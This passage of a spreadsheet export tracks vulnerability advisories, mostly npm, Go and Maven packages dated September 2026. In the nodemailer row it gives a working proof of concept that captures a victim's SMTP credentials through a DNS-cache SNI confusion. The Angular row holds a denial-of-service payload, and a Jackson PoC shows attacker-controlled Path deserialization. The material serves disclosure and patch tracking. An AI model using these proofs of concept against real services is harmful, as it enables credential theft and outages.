          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101914</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js-xds</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>1.13.1, 1.14.1</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-187, CWE-863</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.1 and 1.14.1, the exact path (method name) matcher used by RBAC performs a prefix comparison instead of an equality comparison when case-insensitive matching is enabled. If one service method name prefixes another and the methods have different access rules, a request for the longer method can match the shorter method's rule and cause incorrect authorization. This issue is fixed in versions 1.13.1 and 1.14.1.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101914</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101913</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-918</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.5.1, the Address6 isLinkLocal method in src/ipv6.ts recognizes only fe80::/64 instead of the complete fe80::/10 IPv6 link-local range. An attacker-controlled address elsewhere in fe80::/10 can therefore pass a trust-boundary check that relies on isLinkLocal. The same address is identified as link-local by getType and getScope, exposing the inconsistent classification. A successful bypass can reach an on-link host outside the intended trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101913</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100701</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>10.0.2</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr"/>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>### Summary
Nodemailer's process-global DNS cache is keyed only by `host`, but each cache entry also stores the caller-specific TLS `servername`. When two direct SMTPS transports use the same DNS host with different `tls.servername` values, the first transport's server name is returned to the second transport and overwrites its explicitly configured value.
As a result, Nodemailer sends the wrong SNI value and verifies the peer certificate against the wrong identity. In a multi-tenant service or SNI-routed SMTP gateway, one tenant can prime the cache so that a victim transport connects to the attacker's TLS virtual host, accepts the attacker's certificate with `rejectUnauthorized: true`, and sends the victim's SMTP credentials to it.
## Affected component
- **Ecosystem:** npm
- **Package:** `nodemailer`
- **Repository:** https://github.com/nodemailer/nodemailer
- **Tested version:** `10.0.1`
- **Tested commit:** `40d52215aac65b811d7e131bc916f68605efd9d2`
- **Runtime-confirmed vulnerable versions:** `5.0.0` and `10.0.1`
- **Affected versions:** `&gt;= 5.0.0, &lt;= 10.0.1`
- **Patched versions:** None known at the time of this report
- **Affected mode:** Direct TLS/SMTPS connections (`secure: true`) where different transports use the same non-IP `host` and different TLS `servername` values
The vulnerable cache implementation was introduced in commit `6859b5dd96c8d9f0070a3169a877181b71df4a3b` on 2018-12-28. Git history shows `v5.0.0` as the first release tag containing that commit. The behavior remains present in `v10.0.1`.
## Details
### Root cause
`src/shared/index.ts` defines one module-global DNS cache, keyed only by the DNS host:
```ts
export const dnsCache = new Map&lt;string, DnsCacheEntry&gt;();
```
Although the cache key contains only `host`, the cached value contains both DNS addresses and the request-specific TLS identity:
```ts
const value: DnsCacheValue = {
    addresses: allAddresses,
    servername: options.servername || host
};
dnsCache.set(host, {
    value,
    expires: Date.now() + (options.dnsTtl || DNS_TTL)
});
```
On a cache hit, `resolveHostname()` returns the cached `servername` without considering the current call's `options.servername`:
```ts
if (!cached.expires || cached.expires &gt;= now) {
    return callback(
        null,
        formatDNSValue(cached.value, {
            cached: true
        })
    );
}
```
`formatDNSValue()` copies that stale value into the result:
```ts
return Object.assign(
    {
        servername: value.servername,
        host,
        _addresses: addresses
    },
    extra || {}
);
```
For a direct TLS connection, `SMTPConnection.connect()` initially copies the current transport's TLS configuration into `opts`. `_resolveAndConnect()` then overwrites every truthy field with the cached resolver result, including `opts.servername`:
```ts
Object.assign(opts, this.options.tls || {});
if (this.servername &amp;&amp; !opts.servername) {
    opts.servername = this.servername;
}
return this._resolveAndConnect(opts, resolved =&gt; {
    this._connectToHost(opts, this.secureConnection);
});
```
```ts
for (const key of Object.keys(resolved!)) {
    if (key.charAt(0) !== '_' &amp;&amp; (resolved as { [key: string]: any })[key]) {
        (opts as { [key: string]: any })[key] = (resolved as { [key: string]: any })[key];
    }
}
```
The resulting `opts` object is passed to `tls.connect()`. Node therefore sends the cached server name as SNI and verifies the certificate against that cached name, rather than against the server name explicitly configured for the current transport.
The default DNS cache TTL is five minutes:
```ts
const DNS_TTL = 5 * 60 * 1000;
```
### Code path
```text
Tenant A: createTransport({ host: H, secure: true,
                            tls: { servername: attackerName } })
  -&gt; SMTPConnection.connect()
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: attackerName })
  -&gt; dnsCache.set(H, { addresses, servername: attackerName })
Victim: createTransport({ host: H, secure: true,
                          tls: { servername: victimName } })
  -&gt; SMTPConnection.connect()
  -&gt; opts.servername = victimName
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: victimName })
  -&gt; dnsCache.get(H)
  -&gt; returns cached servername = attackerName
  -&gt; _resolveAndConnect overwrites opts.servername
  -&gt; tls.connect({ servername: attackerName })
  -&gt; attacker SNI virtual host and certificate are selected
  -&gt; AUTH transmits victim SMTP credentials
```
### Relevant source locations in the tested revision
- `src/shared/index.ts:184` — five-minute default cache TTL
- `src/shared/index.ts:245` — process-global cache keyed by host
- `src/shared/index.ts:247-262` — cached `servername` returned by `formatDNSValue()`
- `src/shared/index.ts:292-323` — host-only lookup and cache-hit return
- `src/shared/index.ts:350-359` — caller-specific `servername` stored in host-only cache
- `src/smtp-connection/index.ts:713-729` — direct TLS options and resolver call
- `src/smtp-connection/index.ts:741-763` — cached fields overwrite current connection options
## PoC
### Prerequisites
- Node.js 20 (tested with Node.js `20.20.2`)
- A checkout/build of Nodemailer `10.0.1`
- OpenSSL to generate the local test certificate
No external SMTP server or network access is required.
### 1. Generate a certificate for only `attacker.test`
Create `openssl.cnf`:
```ini
[req]
distinguished_name = dn
x509_extensions = ext
prompt = no
[dn]
CN = attacker.test
[ext]
subjectAltName = DNS:attacker.test
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyEncipherment,keyCertSign
extendedKeyUsage = serverAuth
```
Generate the certificate and private key:
```bash
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout attacker-key.pem -out attacker-cert.pem -config openssl.cnf
```
### 2. Save the following as `poc-dns-cache-servername-confusion.mjs`
Adjust the two import paths if the PoC is not saved beside the repository checkout.
```js
import fs from 'node:fs';
import tls from 'node:tls';
import nodemailer from '../../nodemailer/dist/esm/nodemailer.js';
import * as shared from '../../nodemailer/dist/esm/shared/index.js';
const cert = fs.readFileSync(new URL('./tls-fixture/attacker-cert.pem', import.meta.url));
const key = fs.readFileSync(new URL('./tls-fixture/attacker-key.pem', import.meta.url));
const observedSni = [];
const observedAuth = [];
const server = tls.createServer({ key, cert }, socket =&gt; {
    observedSni.push(socket.servername);
    socket.write('220 attacker.test ESMTP\r\n');
    let input = '';
    socket.on('data', chunk =&gt; {
        input += chunk.toString();
        let end;
        while ((end = input.indexOf('\r\n')) &gt;= 0) {
            const line = input.slice(0, end);
            input = input.slice(end + 2);
            if (/^EHLO /i.test(line)) {
                socket.write('250-attacker.test\r\n250 AUTH PLAIN\r\n');
            } else if (/^AUTH /i.test(line)) {
                observedAuth.push(line);
                socket.write('235 2.7.0 Authentication successful\r\n');
            } else if (/^QUIT/i.test(line)) {
                socket.end('221 Bye\r\n');
            } else {
                socket.write('250 OK\r\n');
            }
        }
    });
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
try {
    shared.dnsCache.clear();
    // Tenant A seeds the process-global cache for the shared DNS host.
    const attackerTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'attacker@example.test', pass: 'attacker-secret' },
        tls: {
            ca: cert,
            servername: 'attacker.test',
            rejectUnauthorized: true
        }
    });
    await attackerTransport.verify();
    attackerTransport.close();
    // The victim explicitly configures a different TLS identity.
    const victimTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'victim@example.test', pass: 'victim-secret' },
        tls: {
            ca: cert,
            servername: 'victim.test',
            rejectUnauthorized: true
        }
    });
    await victimTransport.verify();
    victimTransport.close();
    const decoded = observedAuth.map(line =&gt;
        line.startsWith('AUTH PLAIN ')
            ? Buffer.from(line.slice('AUTH PLAIN '.length), 'base64').toString()
            : null
    );
    console.log(JSON.stringify({
        attackerConfiguredServername: 'attacker.test',
        victimConfiguredServername: 'victim.test',
        serverObservedSniForBothConnections: observedSni,
        serverReceivedCredentials: decoded
    }, null, 2));
} finally {
    shared.dnsCache.clear();
    await new Promise(resolve =&gt; server.close(resolve));
}
```
### 3. Build and run
From the Nodemailer checkout:
```bash
npm install
npm run build
node ../audit/nodemailer/poc-dns-cache-servername-confusion.mjs
```
### Observed result
```json
{
  "attackerConfiguredServername": "attacker.test",
  "victimConfiguredServername": "victim.test",
  "serverObservedSniForBothConnections": [
    "attacker.test",
    "attacker.test"
  ],
  "serverReceivedCredentials": [
    "\\u0000attacker@example.test\\u0000attacker-secret",
    "\\u0000victim@example.test\\u0000victim-secret"
  ]
}
```
The victim configured `victim.test`, but the server observes `attacker.test` for both handshakes. The local certificate contains only `attacker.test`, yet the victim connection succeeds with `rejectUnauthorized: true` and then sends the victim's username and password.
### Expected result
The second connection must use `victim.test` for SNI and certificate hostname verification. With the PoC certificate, it should fail with a hostname mismatch before SMTP authentication occurs. It must never transmit victim credentials after validating the peer as `attacker.test`.
## Impact
The vulnerability affects long-running applications that create multiple Nodemailer transports in one process and let separate tenants or security domains configure transports that share a DNS `host`. A practical example is an email platform whose SMTP gateway uses SNI to route several customer-specific SMTP endpoints behind one hostname.
An attacker who can create or exercise one transport can prime the global cache with the shared host and the attacker's `tls.servername`. During the cache lifetime, a victim's direct SMTPS connection to that host can:
1. send the attacker's server name as SNI;
2. be routed to the attacker's TLS virtual host;
3. validate the attacker's certificate against the stale name, even though strict certificate validation is enabled; and
4. transmit the victim's SMTP username and password to that endpoint.
Possession of SMTP credentials may also let the attacker read or change mail account state where the provider reuses those credentials, or send mail as the victim. The exact secondary impact depends on the SMTP provider.
Where the attacker cannot control an SNI virtual host, stale cross-transport SNI can still cause certificate mismatch failures and cross-tenant availability impact.
### Preconditions and limitations
- Two transports must execute in the same Node.js process within the cache lifetime.
- They must use the same non-IP `host` cache key and different `tls.servername` values.
- Credential interception requires an endpoint or gateway that routes connections using SNI, or another deployment where the attacker controls the endpoint selected by the stale name.
- The demonstrated path uses direct SMTPS (`secure: true`). The STARTTLS upgrade path constructs TLS options separately and is not claimed vulnerable by this report.
## Suggested remediation
The DNS cache should store DNS data only. `servername` is connection-specific TLS policy and should not be persisted in a cache keyed solely by hostname.
One approach is to remove `servername` from `DnsCacheValue` and derive the returned value from the current request on every path:
```ts
return {
    host: selectedAddress,
    servername: options.servername || options.host || false,
    _addresses: addresses,
    cached: true
};
```
As defense in depth, `_resolveAndConnect()` should not overwrite an explicitly configured `opts.servername` with resolver metadata. Keying the cache by both host and server name would avoid this particular collision, but keeping TLS identity out of a DNS-address cache provides a cleaner separation.
A regression test should create two direct-TLS transports in the same process with the same DNS host and different explicit server names, then assert that each TLS connection observes and verifies its own configured name regardless of cache order.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100701</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101062</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Obot: OAuth Dynamic Client Registration Enables API Token Theft via Audience Confusion in github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101062</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101895</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>20.3.31, 21.2.23, 22.1.6</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>A Denial of Service (DoS) vulnerability exists in `@angular/platform-server`'s DOM emulation parser (`domino`). When processing untrusted user input containing an incomplete DOCTYPE declaration ending with whitespace before EOF (such as `&lt;!DOCTYPE html `), the HTML parser enters an infinite synchronous loop, pegging CPU utilization at 100% and completely freezing the Node.js server process.
### Technical Description
In Angular Server-Side Rendering (SSR), `@angular/platform-server` uses `domino` to parse and sanitize HTML bound through template bindings (such as `[innerHTML]`) or manipulated via DOM APIs.
In Domino's HTML parser (`lib/HTMLParser.js`), tokenizer states that specify fixed lookahead—such as `after_doctype_name_state` (`lookahead = 6`)—rely on the state handler function to explicitly advance the character index pointer (`nextchar`). While branches for whitespace, `&gt;`, and keyword matching advance `nextchar`, the EOF branch (`case -1: // EOF`) emitted doctype and EOF tokens without advancing `nextchar` or transitioning out of the state:
```javascript
case -1: // EOF
  forcequirks();
  emitDoctype();
  emitEOF();
  break;
```
Because `nextchar` remained unchanged pointing to the EOF marker character (`\uFFFF`), the scanner loop (`while (nextchar &lt; numchars)`) repeatedly re-invoked `after_doctype_name_state` with `codepoint = EOF` indefinitely. In Node.js's single-threaded runtime, this synchronous loop starves the event loop entirely.
### Impact &amp; Reachability
* **Reachability**: The vulnerability is reachable in any Angular SSR application where untrusted user input is bound to `[innerHTML]`, interpolated into markup, or sanitized on the server.
* **Impact**: Successful exploitation allows an unauthenticated remote attacker to cause an immediate Denial of Service (DoS) by sending a payload containing an incomplete DOCTYPE (e.g., `&lt;!DOCTYPE html `). The Node.js SSR process locks up at 100% CPU and ceases responding to all concurrent and subsequent HTTP requests.
**Proof of Concept:**
```ts
import { Component } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;div [innerHTML]="payload"&gt;&lt;/div&gt;`,
})
export class AppComponent {
  // Attacker-controlled input containing an incomplete DOCTYPE ending with whitespace
  payload = '&lt;!DOCTYPE html ';
}
```
### Workarounds
* Avoid binding untrusted user input directly to `[innerHTML]` in server-rendered templates; use standard text interpolation (`{{ userInput }}`) or `[textContent]` when raw HTML rendering is not required.
* Validate or sanitize user input before passing it to `[innerHTML]` on the server by stripping or rejecting strings matching `/^&lt;!DOCTYPE/i`.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101895</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10601</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr"/>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>Grafana: Path traversal in the Tempo and Loki data source plugins in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10601</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12249</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/ubuntu/adsys</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Canonical ADSys Uses a Less Trusted Source in github.com/ubuntu/adsys.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github.com/ubuntu/adsys before v0.16.3-0.20250318112551-8b1939f96d38.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12249</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>### Summary
A `java.nio.file.Path` field bound from untrusted JSON reaches `JDKFromStringDeserializer.NioPathHelper.deserialize`. The attacker string flows through `new URI(value)` → `Path.of(uri)`, then on `FileSystemNotFoundException` into a `ServiceLoader&lt;FileSystemProvider&gt;` enumeration that calls `provider.getPath(uri)` on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default `JsonMapper.builder().build()`.
Impact is bounded. The JDK built-in providers (`file`, `jar`/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding `Path` from untrusted input is already an anti-pattern.
### Description
`NioPathHelper.deserialize` performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via `ctxt.handleInstantiationProblem(...)`):
```java
int colonIx = value.indexOf(':');
if (colonIx &lt; 0) { return Path.of(value); }
...
final URI uri = new URI(value);          // attacker-controlled URI string
try {
    return Path.of(uri);                  // resolves scheme -&gt; may load a FileSystemProvider
} catch (FileSystemNotFoundException cause) {
    final String scheme = uri.getScheme();
    for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {
        if (provider.getScheme().equalsIgnoreCase(scheme)) {
            return provider.getPath(uri);  // attacker scheme selects &amp; drives a provider
        }
    }
    // no matching provider -&gt; ctxt.handleInstantiationProblem(...) (throws by default)
}
```
The attacker's scheme selects the provider and the attacker's URI is passed to it; the enumeration also forces provider classloading during `readValue`. For built-in schemes like `jar:`, `getPath` throws `FileSystemNotFoundException` (a mount requires explicit `newFileSystem`), surfacing as a wrapped `ValueInstantiationException` with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.java`
  - `STD_PATH` → `NioPathHelper.deserialize`; `NioPathHelper.deserialize` body 
       (`new URI` → `Path.of(uri)` → `ServiceLoader.load(FileSystemProvider.class)` → `provider.getPath(uri)`).
## Proof of Concept
Two PoCs are provided. 
&gt; PoC 2 registers a custom `FileSystemProvider` to show that attacker JSON reaches `provider.getPath(attackerURI)` inside `readValue`. Whether a third-party provider then does anything harmful is outside the library's control. The in-scope issue is **PoC 1** — the `jar:`/arbitrary-scheme path reaching the `ServiceLoader` fallback with no scheme restriction.
**PoC 1 — sink reached (built-in `jar` provider).** 
`com/poc/Vuln04_PathProvider.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import java.nio.file.Path;
/**
 * Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via
 * Path.of(uri) / ServiceLoader&lt;FileSystemProvider&gt;.
 */
public class Vuln04_PathProvider {
    public static class Config { public Path workdir; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        // jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.
        String json = "{\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}";
        System.out.println("Deserializing (default mapper): " + json);
        try {
            Config c = mapper.readValue(json, Config.class);
            System.out.println("Resolved Path = " + c.workdir + "  (class=" + (c.workdir==null?"null":c.workdir.getClass().getName()) + ")");
            System.out.println("RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue");
        } catch (Throwable t) {
            System.out.println("Throwable during resolution: " + t.getClass().getName() + ": " + t.getMessage());
            System.out.println("RESULT: VULNERABLE (attacker URI drove provider resolution; threw " + t.getClass().getSimpleName() + " inside readValue)");
        }
    }
}
```
